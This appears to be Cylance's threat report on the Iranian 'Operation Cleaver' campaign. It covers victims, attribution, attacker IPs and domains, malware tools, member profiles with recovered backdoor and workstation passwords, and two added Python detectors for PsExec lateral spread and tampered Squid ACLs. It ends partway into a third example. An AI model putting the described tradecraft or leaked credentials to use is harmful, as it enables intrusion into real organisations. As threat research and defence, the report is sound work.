Hacking campaigns sourced out of Iran are nothing new. Since the early 2000s, the information security industry as a whole has tracked teams like the Iranian Cyber Army, which mainly focuses on patriotic hacking (website defacements). After the release of Stuxnet, Iran's motivations appear to have shifted. Retaliation for Stuxnet began almost immediately in 2011 with campaigns like the certificate compromises of Comodo and DigiNotar. These attacks served as a warning, showcasing the rapid evolution of Iran's hacking skills. A major retaliation came in the form of 2012's Shamoon campaign, which impacted RasGas and Saudi Aramco.
It's estimated that Shamoon impacted over 30,000 computer endpoints and cost the affected companies tens of thousands of hours recovering from the attacks. The direct financial impact from this retaliation and the amount of downtime experienced were staggering. Shamoon was truly a watershed event for security defenders. It was the first glimpse into the real capability and intention of Iranian cyber operations. We see the same motivation and intent here in Operation Cleaver: establishing a beachhead for cyber sabotage.

We saw further Iranian backlash in late 2012 and early 2013 in the form of Operation Ababil's Distributed Denial of Service (DDoS) attacks against US banks. These attacks were debilitating and impacted the availability of online banking services. Yet more backlash was witnessed with FireEye's exposure of Operation Saffron Rose, an espionage campaign executed by the Ajax Security Team in 2014. In May 2014, evidence emerged of a highly targeted waterhole attack that leveraged social media, dubbed Operation Newscaster, which was uncovered by iSight Partners.

In June 2013, Israeli Prime Minister Benjamin Netanyahu accused Iran of carrying out "non-stop" attacks on "[Israel's] vital national systems" including "water, power and banking"4. The following September of 2013, the Wall Street Journal accused Iran of hacking into unclassified U.S. Navy computers in San Diego's NMCI (Navy Marine Corp Intranet),5 which we can confirm was part of Operation Cleaver.

Figure 1: The sequence of major Iran-centric attacks; either as victims (left) or attackers (right).
While previously reported operations attributed to Iran have largely focused on Defense Industrial Base (DIB) companies, the United States Federal Government, or targets in Middle Eastern countries, Operation Cleaver has instead focused on a wide array of targets, including energy producers and utilities, commercial airlines and airports, military intelligence, aerospace, hospitals, and even universities – with only ten of the targets based in the United States. Such broad targeting demonstrates to the world that Iran is no longer content to retaliate against the US and Israel alone. They have bigger intentions: to position themselves to impact critical infrastructure globally.

[Figure 1 timeline, 2010-2014, with columns "Origination" and "Retaliation": Stuxnet, Duqu, Flame, Gauss, DigiNotar, Shamoon, Ababil, Operation Newscaster, Saffron Rose, NMCI (Navy Marine Corps Intranet).]

WHY THE NAME CLEAVER?

The string cleaver is found several times in a variety of custom software used in Operation Cleaver, including:

Numerous references inside the namespaces of their custom bot code codenamed TinyZBot, e.g.:
e:\projects\cleaver\trunk\zhoupin_cleaver\obj\x86\release\netscp.pdb

PDBs associated with the hacker name "Jimbp", e.g.:
sers\jimbp\desktop\binder_1 - for cleaver\binder_1\obj\x86\release\setup.pdb

PDBs associated with the keystroke loggers, artifacts, and numerous other tools, e.g.:
e:\Projects\Cleaver\trunk\MainModule\obj\Release\MainModule.pdb

WHY EXPOSE IRAN NOW?

We believe our visibility into this campaign represents only a fraction of Operation Cleaver's full scope. We believe that if the operation is left to continue unabated, it is only a matter of time before the world's physical safety is impacted by it.
While the disclosure of this information will be a detriment to our ability to track the activity of this group, it will allow the security industry as a whole to defend against this threat. As such, we are exposing this cyber campaign early in an attempt to minimize additional real-world impact and prevent further victimization.

CRITICAL DISCOVERIES

Iranian Actors Are Behind Operation Cleaver

• Persian hacker names are used throughout the campaign including: Salman Ghazikhani, Bahman Mohebbi, Kaj, Parviz, Alireza, and numerous others.
• Numerous domains used in the campaign were registered in Iran.
• Infrastructure leveraged in the attack was registered in Iran to the corporate entity Tarh Andishan, which translates to “invention” or “innovation” in Farsi.
• Source netblocks and ASNs are registered to Iran.
• Hacker tools warn when their external IP address traces back to Iran.
• The infrastructure is hosted through Netafraz.com, an Iranian provider out of Isfahan, Iran.
• The infrastructure utilized in the campaign is too significant to be a lone individual or a small group. We believe this work was sponsored by Iran.

Operation Cleaver Targets Critical Infrastructure Around the World

• US Military targets including NMCI in October 2013.5 Confirmed targeting of global government entities.
• Networks and systems targeted in critical industries like energy and utilities, oil and gas, and chemical companies.
• Assets (both cyber and physical) and logistics information were compromised at major airline operators, airports, and transportation companies.
• Various global telecommunications, technology, healthcare, aerospace, and defense companies were breached as part of the operation.
• Confidential critical infrastructure documents were harvested from major educational institutions around the world.

Iran’s Cyber Hacking Skills Have Evolved

• Initial compromise techniques include SQL injection, web attacks, and creative deception-based attacks – all of which have been implemented in the past by Chinese and Russian hacking teams.
• Pivoting and exploitation techniques leveraged existing public exploits for MS08-067 and Windows privilege escalations, and were coupled with automated, worm-like propagation mechanisms.
• Customized private tools with functions that include ARP poisoning, encryption, credential dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB communications, network interface sniffing, and keystroke logging.
• The ability to build customized tools to compromise any target they choose.

Indicators of Compromise (IOC)

• Private signing certificates of one victim were captured allowing the Operation Cleaver team to compromise the entirety of their organization.
• Over the past two years, Cylance has collected over 8GB of data including over 80,000 files of exfiltrated data, hacker tools, victim logs, and highly sensitive reconnaissance data.
• Data from sinkholed command and control servers has allowed us to track this active campaign.
• Cylance is releasing more than 150 IOCs and samples associated with the Cleaver campaign to empower the security community to detect existing compromises in their own organizations, as well as potentially block future attacks from these teams.
Speculation

• This campaign continues Iran’s retaliation for Stuxnet, Duqu, and Flame.
• This is a state-sponsored campaign.
• There is a possibility that this campaign could affect airline passenger safety.
• This campaign’s intentions may be to damage Industrial Control Systems (ICS), Supervisory Control and Data Acquisition (SCADA) systems, and impact Critical Infrastructure and Key Resources (CIKR).
• This campaign could be a way to demonstrate Iran’s cyber capabilities for additional geopolitical leverage, due to the breadth and depth of their global targets.
• There is an intense focus on CIKR companies in South Korea, which could give Iran additional clout in their burgeoning partnership with North Korea. In September 2012, Iran signed an extensive technology cooperation agreement with North Korea, which would allow for collaboration on various efforts including IT and security.6
• Iran is recruiting from within the universities and potentially using ‘hackers for hire’.7

TARGETS & VICTIMS

The Cleaver team targets some of the most sensitive global critical infrastructure companies in the world, including military, oil and gas, airlines, airports, energy producers, utilities, transportation, healthcare, telecommunications, technology, manufacturing, education, aerospace, Defense Industrial Base (DIB), chemical companies and governments. Countries impacted include Canada, China, England, France, Germany, India, Israel, Kuwait, Mexico, Pakistan, Qatar, Saudi Arabia, South Korea, Turkey, United Arab Emirates, and the US.
The following is a breakdown by country of which industries were targeted and/or victimized:

Canada: Energy & Utilities, Oil & Gas, Hospitals
China: Aerospace
England: Education
France: Oil & Gas
Germany: Telecommunications
India: Education
Israel: Aerospace, Education
Kuwait: Oil & Gas, Telecommunications
Mexico: Oil & Gas
Pakistan: Airports, Hospitals, Technology, Airlines
Qatar: Oil & Gas, Government, Airlines
Saudi Arabia: Oil & Gas, Airports
South Korea: Airports, Airlines, Education, Technology, Heavy Manufacturing
Turkey: Oil & Gas
United Arab Emirates: Government, Airlines
United States: Airlines, Education, Chemicals, Transportation, Energy & Utilities, Military/Government, Defense Industrial Base

Cleaver’s level of access into each organization varied greatly, including completely compromised systems and networks, Active Directory domain controllers and credentials, compromised data repositories and stolen VPN credentials. Compromised systems include Microsoft Windows web servers running IIS and ColdFusion, Apache with PHP, many variants of Microsoft Windows desktops and servers, and Linux servers. Compromised network infrastructure included Cisco VPNs as well as Cisco switches and routers. Unlike Stuxnet, no exotic exploitations (such as 0-days) were observed.

Within our investigation, we had no direct evidence of a successful compromise of specific Industrial Control Systems (ICS) or Supervisory Control and Data Acquisition (SCADA) networks, but Cleaver did exfiltrate extremely sensitive data from many critical infrastructure companies allowing them to directly affect the systems they run. This data could enable them, or affiliated organizations, to target and potentially sabotage ICS and SCADA environments with ease. We discovered over 50 victims in our investigation, distributed around the globe.
Ten of these victims are headquartered in the US and include a major airline, a medical university, an energy company specializing in natural gas production, an automobile manufacturer, a large defense contractor, and a major military installation. The four targets in Israel and the five targets in Pakistan are comprised of education, aerospace, airports, airlines, healthcare and technology. Further victims were identified in numerous Middle Eastern countries as well as ones in Northern Europe including the UK, France, and Germany. Central America was not immune either, with a large oil and gas company on the list. In fact, oil and gas was a particular focal point for the Cleaver team, going after no less than nine of these companies around the world.

Universities were targeted in the US, India, Israel, and South Korea. The attackers targeted research efforts, student information, student housing, and financial aid systems. They had a penchant for pictures, passports, and any specific identifying information.

Perhaps the most bone-chilling evidence we collected in this campaign was the targeting and compromise of transportation networks and systems such as airlines and airports in South Korea, Saudi Arabia and Pakistan. The level of access seemed ubiquitous: Active Directory domains were fully compromised, along with entire Cisco Edge switches, routers, and internal networking infrastructure. Fully compromised VPN credentials meant their entire remote access infrastructure and supply chain was under the control of the Cleaver team, allowing permanent persistence under compromised credentials. They achieved complete access to airport gates and their security control systems, potentially allowing them to spoof gate credentials. They gained access to PayPal and Go Daddy credentials, allowing them to make fraudulent purchases and giving them unfettered access to the victim’s domains.
We witnessed a shocking amount of access into the deepest parts of these companies and the airports in which they operate.

Figure 2: Geographic distribution of victims, as determined by the global headquarters of the parent company or organization breached.

TARGET LOCATIONS

1. Canada - Calgary
2. Canada - Hamilton
3. China - Beijing
4. England - Oxford
5. France - Paris
6. Germany - Dusseldorf
7. Germany - Frankfurt
8. India - New Delhi (2)
9. Israel - Haifa (3)
10. Israel - Rehovot
11. Kuwait - Ahmadi
12. Kuwait - Kuwait City
13. Mexico - Mexico City
14. Pakistan - Karachi (2)
15. Pakistan - Lahore
16. Pakistan - Multan
17. Pakistan - Peshawar
18. Qatar - Doha (4)
19. Saudi Arabia - Dhahran
20. Saudi Arabia - Jeddah
21. South Korea - Incheon
22. South Korea - Goyang-si
23. South Korea - Seoul (7)
24. Turkey - Antalya
25. UAE - Abu Dhabi
26. UAE - Al Garhoud
27. USA - California - Los Angeles (2)
28. USA - California - San Diego
29. USA - California - San Jose
30. USA - Michigan - Dearborn
31. USA - Texas - Houston (2)
32. USA - Texas - Fort Worth
33. USA - Texas - Southlake
34. USA - Virginia - Fairfax
35. USA - Virginia - McLean

Figure 3: Number of Cleaver victims by the level of access obtained as well as the level of critical impact potential.
[Figure 3 chart: axes Level of Access and Level of Critical Impact (High, Medium, Low); industries targeted: Technology, Aerospace, Education, Chemicals, Hospitals, Telecommunications, Transportation, Government, Oil & Gas, Airlines, Airports, Energy & Utilities, Manufacturing, Defense Industrial.]

ATTRIBUTION

Despite today’s trend toward attacker attribution, we believe it offers little real benefit to the day-to-day cyber defender. However, in this report we offer our observations on the sources of Operation Cleaver in order to benefit those that rely on attribution such as Law Enforcement.

Operation Cleaver is believed to consist of at least 20 hackers and developers, collaborating on projects and missions to support Iranian interests. Many of the targets were predominately English-speaking and a majority of the team members were capable of reading and writing in English. We present evidence that this team is operating, at least in part, out of Iran and in the interests of Iran. The skills and behavior of the Operation Cleaver teams are consistent with, and in one case surpasses, Iran’s cyber capabilities as we know them today. For a complete list of IPs and domains related to this campaign, please refer to the Indicators of Compromise section.

ATTACKER IP ADDRESSES

Over the course of multiple incident response engagements related to Operation Cleaver, we were able to identify a small set of IP addresses which were commonly used during the initial stages of an attack. The IP address 78.109.194.114 served as a source for one of the primary attackers.
They were observed conducting SQL injections, controlling backdoors, as well as exfiltrating information using this address, and the address appears in multiple software configurations recovered from staging servers over a period of time.

GeoIP Location: Iran
Net block: 78.109.194.96 - 78.109.194.127
Owner: Tarh Andishan
Email: tarh.andishan(at)yahoo.com
Phone: +98-21-22496658
NIC-Handle: TAR1973-RIPE

Figure 4: The logo of the Army of the Guardians of the Islamic Revolution, also known as the Islamic Revolutionary Guard Corps (IRGC).

This IP address was also observed in multiple software configurations. This particular net block was used over an extended period of time, indicating these were under the Cleaver team’s physical control. Additionally, prior netblocks used by the same team demonstrated to us that this wasn’t simply a case of proxying or “island hopping”. For more information see the Tarh Andishan section of this report.

The IP address 159.253.144.209 was a source for a secondary attacker in various compromises. They were observed conducting SQL injection attacks. While this IP was registered in the Netherlands, we believe they used Softlayer’s Citrix demo environment to launch these attacks, which is consistent with proxying or “island hopping”.

GeoIP Location: Netherlands
Net block: 159.253.144.208 - 159.253.144.223
ASN: Softlayer Technologies, Inc.
IP Location: Netherlands, Amsterdam with Iranian sourcing.

ATTACKER DOMAINS

A number of Cleaver’s attack methods require a persistent server. In many cases, these servers were referenced by domain names. The following malicious domains are operated by this organization and are grouped by the registrant’s email address.
davejsmith200(at)outlook.com
• Teledyne-Jobs.com
• DownloadsServers.com
• NorthropGrumman.net
• MicrosoftMiddleAst.com

salman.ghazikhani(at)outlook.com
• Doosan-Job.com

btr.8624(at)yahoo.com
• GoogleProductUpdate.net
• WindowsCentralUpdate.com
• WindowsUpdateServer.com
• DriverCenterUpdate.com

azlinux73(at)gmail.com
• MicrosoftServerUpdate.com
• WindowsSecurityUpdate.com
• WindowsServerUpdate.com

domain(at)netafraz.com
• EasyResumeCreatorPro.com
• MicrosoftWindowsResources.com

msnhst(at)microsoft.com
• MicrosoftWindowsUpdate.net

As is typical with malicious domains, the Whois data for most of these domains contained falsified information.

We managed to obtain a large collection of the internally developed tools used by the Cleaver team, many of which were developed by its members. Due to operational security failures, these tools contain information that provided us insight into their organization and operations.

TOOLS & SOFTWARE

Shell Creator 2

In the tool named Shell Creator 2, there are three main components. The creator generates an ASPX web shell using user input as well as a collection of templates. The web shell could then be installed via xp_cmdshell, or any other method which would grant the attacker write access. The web shell is accessible by the shell client directly.

The shell client is a portion of Shell Creator 2 that was not designed to be run on a compromised computer. We originally located it on a staging server being utilized for multiple attacks as well as a tool for sharing data between members of the organization’s team. The shell client, which is developed in Java and is easily decompiled, is a simple interface with a feature to protect the operator from making a critical mistake.
When executed, and before any connection to an instance of the web shell is initiated, the shell client communicates with freegeoip.net in order to get the external IP address of the current user. The country of origin is then shown to the user, to inform them of what country it appears they are connecting from. The assumed purpose of this feature is to ensure that a proper proxy is in use, and the real origin of the attacker is not revealed.

After decompiling the shell client, we found the following code segment controlling the display of this IP location information. This code handles the XML response from freegeoip.net, and displays the information as different colors based on different attributes. For instance, if the string “ERROR” is in the response, the text is displayed with the color magenta. If the string IRAN is in the response, the text is displayed with the color red. It should be noted that no other country name contains the substring IRAN.

Figure 5: Java source code showing how Shell Creator 2 distinguishes between a source IP address coming from Iran (red) versus any other country (green).

Figure 6: Shell Creator 2 alerts the user in red when the IP being used can be sourced to Iran.

Figure 7: Shell Creator 2 notifies the user in green when their source IP address is not Iran.

Net Crawler

Net Crawler is a tool developed in C# that exhibits worm-like behavior in order to gather cached credentials from any and all accessible computers on an infected network. This is done with Windows Credential Editor (WCE) and Mimikatz in combination with PsExec. Different versions of this malware contain ASCII art which names the authoring group as Zhoupin (in “leetspeak” as “Zh0up!n”). For more information on Net Crawler, see the Tactics, Techniques and Procedures section.
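Net Crawler’s spread, as described above, rides on PsExec reaching one host after another. From the defender’s side that leaves a consistent trace: PsExec installs a service named PSEXESVC on each host it is pointed at, and Windows records every new service installation as Event ID 7045 in the System log. The following is an added example (not Cylance’s code and not part of the report) that looks for the worm-like fan-out pattern in such events: many PSEXESVC installs on distinct hosts inside a short window. The event records, host names and timestamps are constructed for the example.

```python
from datetime import datetime, timedelta

# Constructed Windows System-log records, flattened to one dict each (not data
# from the report). Event ID 7045 is logged when a new service is installed;
# PsExec installs one named PSEXESVC on every host it is pointed at.
SAMPLE_EVENTS = [
    {"time": "2013-05-02T01:12:03", "host": "FILESRV01", "event_id": 7045,
     "service": "PSEXESVC", "image": r"%SystemRoot%\PSEXESVC.exe"},
    {"time": "2013-05-02T01:12:11", "host": "WKS-022", "event_id": 7045,
     "service": "PSEXESVC", "image": r"%SystemRoot%\PSEXESVC.exe"},
    {"time": "2013-05-02T01:12:20", "host": "WKS-031", "event_id": 7045,
     "service": "PSEXESVC", "image": r"%SystemRoot%\PSEXESVC.exe"},
    {"time": "2013-05-02T01:12:29", "host": "DC01", "event_id": 7045,
     "service": "PSEXESVC", "image": r"%SystemRoot%\PSEXESVC.exe"},
    # A lone admin use of PsExec two hours later: not a burst on its own.
    {"time": "2013-05-02T03:40:00", "host": "WKS-007", "event_id": 7045,
     "service": "PSEXESVC", "image": r"%SystemRoot%\PSEXESVC.exe"},
    # Unrelated service install, must be ignored.
    {"time": "2013-05-02T09:00:00", "host": "WKS-010", "event_id": 7045,
     "service": "Spooler2", "image": r"C:\Windows\System32\spoolsv.exe"},
]


def psexec_service_installs(events):
    """Keep only 7045 events whose service name is PSEXESVC."""
    return [e for e in events
            if e["event_id"] == 7045 and e["service"].upper() == "PSEXESVC"]


def fanout_bursts(events, window=timedelta(minutes=10), min_hosts=3):
    """Slide a window over PSEXESVC installs and report bursts in which PsExec
    reached at least min_hosts distinct hosts: the worm-like spread pattern.
    Returns a list of {"start": iso_time, "hosts": [...]} dicts."""
    installs = sorted(psexec_service_installs(events), key=lambda e: e["time"])
    bursts = []
    i = 0
    while i < len(installs):
        start = datetime.fromisoformat(installs[i]["time"])
        hosts = []
        j = i
        while (j < len(installs)
               and datetime.fromisoformat(installs[j]["time"]) - start <= window):
            if installs[j]["host"] not in hosts:
                hosts.append(installs[j]["host"])
            j += 1
        if len(hosts) >= min_hosts:
            bursts.append({"start": installs[i]["time"], "hosts": hosts})
            i = j  # skip past the events already attributed to this burst
        else:
            i += 1
    return bursts


if __name__ == "__main__":
    for burst in fanout_bursts(SAMPLE_EVENTS):
        print(f"PsExec fan-out starting {burst['start']}: {', '.join(burst['hosts'])}")
```

The thresholds (10 minutes, 3 hosts) are tuning assumptions; legitimate administrative use of PsExec usually touches one host at a time, so a burst across several hosts, especially including a domain controller, is what a credential-harvesting worm such as Net Crawler would produce.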
Figure 8: Net Crawler version 1.0 has ASCII art showing the use of “Zh0up!n” in the campaign’s tools.

Figure 9: Updated ASCII art found in the Net Crawler tool shows a version of “Zh0up!n” shortened to simply “Zh0”.

TinyZBot

TinyZBot is a bot written in C# and developed by the Cleaver team. It is the longest developed malware family discovered by this group, and has been used in campaigns for close to two years. How it operates can vary greatly from version to version. For a detailed technical analysis of TinyZBot, see the Tactics, Techniques and Procedures section.

As TinyZBot is developed in C#, many versions can be decompiled to code very similar to their originals, including names of namespaces. Many versions were obfuscated with a legitimate tool for developers named SmartAssembly, which makes the recovery of some names implausible. We obtained multiple versions from which we were able to recover many of the original names of variables and namespaces. In a number of these samples, the primary namespace for TinyZBot is named Zhoupin_Cleaver. In every version of TinyZBot that is not obfuscated, there is a code base referred to as Cleaver. This code base is also shared in other malware developed by this organization, such as Csext.

PrivEsc

PrivEsc is a blatant plagiarism of an existing exploit for Microsoft Windows released in January 2010 called MS10-015, “Vulnerabilities in Windows Kernel Could Allow Escalation of Privilege”, popularly known as the KiTrap0D exploit which was released publicly. The Cleaver team clearly modified the source code and compiled a new version. The only detectable modification was to change the original author’s name to instead display the following:

Zhopin Exploit Team

This is not the only case of this team relabeling others’ work as their own.
Logger Module

Logger module is a component of the PVZ (PVZ is shorthand for Parviz, one of the members of the Cleaver team) bot tool chain. When executed, it will capture the user’s keystrokes and save them to a location which PVZ bot then exfiltrates. The logger module binary’s file description value is the following:

ye file khube DG. ba in ham kari nadashte bashin

Roughly translated from Persian, this text says:

DG is a good file, don’t bother with this

This text could potentially be a note intended to stay internal, or could be an attempt to persuade an unsuspecting victim to assume the file is not malicious. The Product Name value is GOOD FILE. For more information on the PVZ bot tool chain, see the Tactics, Techniques, and Procedures section.

CCProxy

CCProxy is a publicly available proxy server for Windows, which can handle a variety of protocols. We do not believe that this organization was involved in the development or modification of CCProxy, but they have been observed using it. We recovered a CCProxy configuration, which exposed various operational details. The configuration allowed for remote connections, limited by a username as well as a limited IP range. The username was User-001, which is the default value. The limited IP range covered one IP: 78.109.194.114. This IP address is located in Iran, and is owned by Tarh Andishan. The configuration also indicates which address the CCProxy server should listen on for incoming connections such as web (80) and mail (25).

Figure 10: CCProxy configuration file using the hardcoded IP address registered to Tarh Andishan.

Figure 11: CCProxy configuration file showing the use of web and mail as listening ports.
NMAP Log

Log output from the network port scanning application NMAP was recovered from a staging server. This log was generated during the usage of the nbrute utility, which brute-forces network credentials and relies on NMAP to do so. The header of this NMAP log indicates that the computer used to run nbrute/nmap was set to Iran Daylight Time at the time of execution.

Starting Nmap 6.25 at 2012-08-17 09:18 Iran Daylight Time

With no known victims located in Iran, it is likely that this was executed on an attacker’s computer, and not on a victim’s computer.

Squid Configuration

A configuration file for a Squid proxy server was recovered. The net range of 78.109.194.114/28 was inserted into the allowed local networks with an RFC comment appended in order to make it look like it was part of the default configuration. It is likely this is the same reason a /28 net range was used, in order to not look like it was intended to only allow one IP. This would give the same access to resources accessible from the Squid proxy server to this Iranian IP address.

Figure 12: Squid configuration file showing the use of Tarh Andishan’s IP address.

TARH ANDISHAN

Tarh Andishan is listed as the registrant for a number of small net blocks based upon the email address tarh.andishan(at)yahoo.com. The net blocks appear to rotate over time and registrant information is altered to accommodate ongoing operations and avoid potential public exposure. The networks are included below as well as the last time that net block was observed as active.
• 78.109.194.96/27 - Current
• 217.11.17.96/28 - 10/22/2014
• 81.90.144.104/29 - 10/5/2014
• 31.47.35.0/24 – 11/2012

There are many seemingly legitimate Tarh Andishan related companies inside Tehran, but strong connections to Iranian backing have been difficult to prove definitively. “Tarh Andishan” is often translated as “Thinkers”, “Innovators” and “Inventors”. The net blocks above have strong associations with state-owned oil and gas companies. These companies have current and former employees who are ICS experts.

Tarh Andishan has been suspected in the past of launching attacks in the interest of Iran. The operators of the blog IranRedLine.org, which comments on Iran’s nuclear weapons efforts, have mentioned in multiple posts having been the target of debilitating brute-force authentication attacks from IP addresses registered to the same Tarh Andishan team found in Cleaver. In one of IranRedLine.org’s blog posts8, the author speculates on Tarh Andishan’s involvement with the Iranian government by showing close proximity to SPND, the Organization of Defensive Innovation and Research; however, the phone number listed under the registrant contact information has yet to be completely validated.

Figure 13: This image from IranRedLine.org demonstrates the proximity of Tarh Andishan’s probably fabricated Whois address to Iran’s SPND (Organization of Defensive Innovation and Research).

MEMBERS

During this investigation, we were able to compile a considerable amount of information on some of the members of this organization. The following profiles were built from reverse engineering, code analysis, open source intelligence, incident response and forensics work.
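The Squid finding above (a public /28 slipped into the default localnet ACLs with a copied RFC 1918 comment) and the Tarh Andishan net block list both lend themselves to one routine check. The following is an added example, not code from the report or from Cylance: it parses the `acl <name> src <cidr>` lines of a squid.conf, flags any source ACL that is not a private, loopback or link-local range, and notes whether the flagged range overlaps one of the net blocks listed above. The configuration fragment is constructed for the example; only the net blocks come from the report.

```python
import ipaddress
import re

# Constructed sample squid.conf fragment (not the file Cylance recovered). The
# fourth localnet line mimics the technique described in the report: a public
# /28 inserted among the default RFC 1918 entries with a matching fake comment.
SAMPLE_SQUID_CONF = """\
acl localnet src 10.0.0.0/8     # RFC1918 possible internal network
acl localnet src 172.16.0.0/12  # RFC1918 possible internal network
acl localnet src 192.168.0.0/16 # RFC1918 possible internal network
acl localnet src 78.109.194.114/28 # RFC1918 possible internal network
acl localnet src fc00::/7       # RFC 4193 local private network range
http_access allow localnet
"""

# Net blocks listed in the report's Tarh Andishan section.
TARH_ANDISHAN_BLOCKS = [
    ipaddress.ip_network(b) for b in (
        "78.109.194.96/27", "217.11.17.96/28", "81.90.144.104/29", "31.47.35.0/24")
]

ACL_SRC = re.compile(r"^\s*acl\s+(\S+)\s+src\s+(\S+)")


def parse_src_acls(conf_text):
    """Return (acl_name, network) tuples for every 'acl <name> src <cidr>' line."""
    found = []
    for line in conf_text.splitlines():
        m = ACL_SRC.match(line)
        if not m:
            continue
        name, cidr = m.groups()
        # strict=False accepts host-style entries such as 78.109.194.114/28 and
        # normalises them to the containing network (78.109.194.112/28), which is
        # what Squid will actually allow.
        found.append((name, ipaddress.ip_network(cidr, strict=False)))
    return found


def audit_localnet(conf_text, ioc_blocks=TARH_ANDISHAN_BLOCKS):
    """Flag src ACL entries that are globally routable, and record any overlap
    with a known attacker net block. Returns a list of finding dicts."""
    findings = []
    for name, net in parse_src_acls(conf_text):
        if net.is_private or net.is_loopback or net.is_link_local:
            continue
        hits = [str(b) for b in ioc_blocks
                if b.version == net.version and b.overlaps(net)]
        findings.append({"acl": name, "network": str(net), "ioc_overlap": hits})
    return findings


if __name__ == "__main__":
    for f in audit_localnet(SAMPLE_SQUID_CONF):
        print(f"acl {f['acl']}: public source range {f['network']}"
              + (f" overlaps attacker block(s) {f['ioc_overlap']}" if f["ioc_overlap"] else ""))
```

Running the check over a proxy configuration as part of a build or incident review catches exactly the trick the report describes: the comment text is ignored, and the decision rests only on whether the range itself is private.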
Personally identifiable information about these members is not being shared publicly as it could endanger their lives and would be irresponsible.

Parviz

Parviz is a developer who worked on a variety of projects, and was primarily active in 2013. His development skillset is based around his ability to develop in C/C++. He has been observed using Visual Studio 2010, and his tools are written exclusively for Windows. Some of his tools were found to be packed with ASPack. Parviz is the primary developer of the PVZ bot and multiple parts of its tool chain. Parviz is likely associated with the PVZ bot as his name is hardcoded into the PDB file paths. The PVZ tool chain includes a variety of functionality, such as HTTP command and control communications with an ASPX server-side component, a denial of service tool they developed, and the public project named XYNTService used to run ordinary applications as services.

PDBs

• C:\Users\parviz\documents\visual studio 2010\Projects\BotManager\Release\BotManager.pdb
• C:\Users\parviz\Documents\Visual Studio 2010\Projects\socket-test\Release\socket-test.pdb
• C:\Users\parviz\Documents\Visual Studio 2010\Projects\XYNTServiceProject\XYNTServiceProject\Debug\XYNTService.pdb
• C:\Users\Parviz\documents\visual studio 2010\Projects\SendModule\Release\SendModule.pdb

Nesha

Nesha is one of the offensive members of this organization. Nesha was seen in breaches involving SQL injection as well as other techniques. Nesha often utilized web-based backdoors developed in ASPX, PHP as well as ColdFusion. A copy of an MS08-067 exploit developed in Python was recovered in which Nesha shamelessly replaced the original author’s name with his own. Nesha’s passwords very commonly include his own handle.
His passwords were frequently stored as hashes in backdoors, but common hash cracking methods were able to recover the plaintext versions. His observed password use is as follows:

• nesha nesha used as password in ColdFusion backdoors
• NeshaNesha12 used as password in ASPX backdoors.
• nesha123 was found as a password in a recovered credential file with unknown association

Cylance observed Nesha participating in compromises involving the following techniques:

• SQL injection
• Web backdoors
• Cached credential dumping

Nesha has additionally been identified using a variety of internally developed tools as well as the following publicly available tools:

• Cain & Abel
• PsExec
• PLink
• NetCat

Alireza

Alireza appears to be one of the senior developers of this organization. His tools are commonly developed in C++, Java, and C# (desktop and ASPX). These tools are often support tools, either monitoring the activity of other tools or supplementing the function of other tools gathering information during the infiltration process. Alireza’s code appears to be reused internally on projects such as TinyZBot.

Alireza appears to be using a version control system for his code, and it is likely that others are using the same system. Based on the paths, the version control system in use is likely Apache’s Subversion. Use of a version control system is indicative of code sharing, but the use of an older system like Subversion, along with other evidence, suggests there is not a large amount of collaboration on projects and likely one developer working on each project at a time. This is not behavior typical of a professional development team.
Alireza’s C# tools include the following techniques:

• Querying Windows Management Instrumentation Command-line (WMIC)
• Cached credential dumping
• Generating ASPX shells
• Encryption
• Process enumeration

Alireza’s Java tools include the following techniques:

• HTTP communications
• GUI development

Alireza’s C++ tools include the following techniques:

• WinPcap interface
• ARP poisoning
• HTTP communications
• SMB communications

PDBs

• C:\Users\alireza\Documents\Visual Studio 2010\CPPProjects\IDCSercive\trunk\Release\kagent.pdb
• C:\Users\alireza\Documents\Visual Studio 2010\CPPProjects\PcapServiceInstaller\Release\PcapServiceInstaller.pdb
• C:\Users\alireza\Documents\Visual Studio 2010\Projects\AntiVirusDetectorConsole\AntiVirusDetectorConsole\obj\x86\Release\AntiVirusDetectorConsole.pdb
• C:\Users\alireza\Documents\Visual Studio 2010\Projects\mimikatzWrapper\mimikatzWrapper\obj\x86\Debug\mimikatzWrapper.pdb
• C:\Users\alireza\Documents\Visual Studio 2010\Projects\ShellCreator2\ShellCreator2\obj\x86\Debug\ShellCreator2.pdb
• c:\Users\alireza\Documents\Visual Studio 2012\Projects\BackDoorLogger\BackDoorLogger\obj\Debug\BackDoorLogger.pdb

kaJ

kaJ is a .NET developer, and has only been observed working in C#. He has less English language proficiency than others in the organization, and likely has a supplemental role during compromises. He has been observed developing tools which cater to specific challenges in a compromise. His notable project was named Net Crawler, and a technical analysis of this tool can be found in the Tactics, Techniques and Procedures section.
Thanks to a recovered test configuration for Net Crawler, we were able to determine that kaJ’s development computer has the name dev-castle, where he has the username kaJ and the password oaolrJ@vad. kaJ is believed to be the creator of the Zhoupin ASCII art displayed in Net Crawler.

kaJ’s projects include the following techniques:

• Interfacing with multiple cached credential dumping tools
• Interfacing with PsExec
• Worming behavior

Jimbp

Jimbp is a .NET developer with minimal experience. His projects appear to be supplemental to TinyZBot and are very simplistic. It is believed he is the developer of the project Binder_1. This project was a simple malware binder which required manual configuration when compiling. His other work included creating a new service wrapper for TinyZBot.

PDBs

• c:\Users\Jimbp\Desktop\Binder_1\Binder_1\obj\x86\Release\Setup.pdb
• c:\Users\Jimbp\Desktop\Binder_1 - for cleaver\Binder_1\obj\x86\Release\Setup.pdb
• c:\Users\Jimbp\Documents\Visual Studio 2013\Projects\TestForInstallingService\TestForInstallingService\obj\Release\TestForInstallingService.pdb

TEAMS

Of course many associated Iranian hacker teams have been identified in public and private security circles. Some of the teams publicly known today include Iranian Cyber Army, Ashiyane, Islamic Cyber Resistance Group, Izz ad-Din al-Qassam Cyber Fighters, Parastoo, Shabgard, Iran Black Hats and many others9. However, even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber Army (botnets), Ashiyane (SQL injection) and Syrian Electronic Army (phishing and RATs), we believe this is largely the work of a new team. Some connections to Ashiyane were discovered in our investigations including a reference to hussein1363, who had prior ties to the hacker group.
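The member profiles above (Parviz, Alireza, Jimbp, and the campaign name itself) rest largely on PDB paths left in compiled binaries. The following is an added example, not Cylance’s tooling, of how an analyst pulls those paths out of a sample and turns them into the attributes used above: it scans raw bytes for the CodeView RSDS record that a Windows linker writes into the PE debug directory (signature, 16-byte GUID, 4-byte age, NUL-terminated PDB path), then extracts the Windows profile name, project folder, build configuration and the "cleaver" keyword from each path. The PE fragment is constructed around a made-up GUID; the PDB paths are ones quoted in the report.

```python
import re
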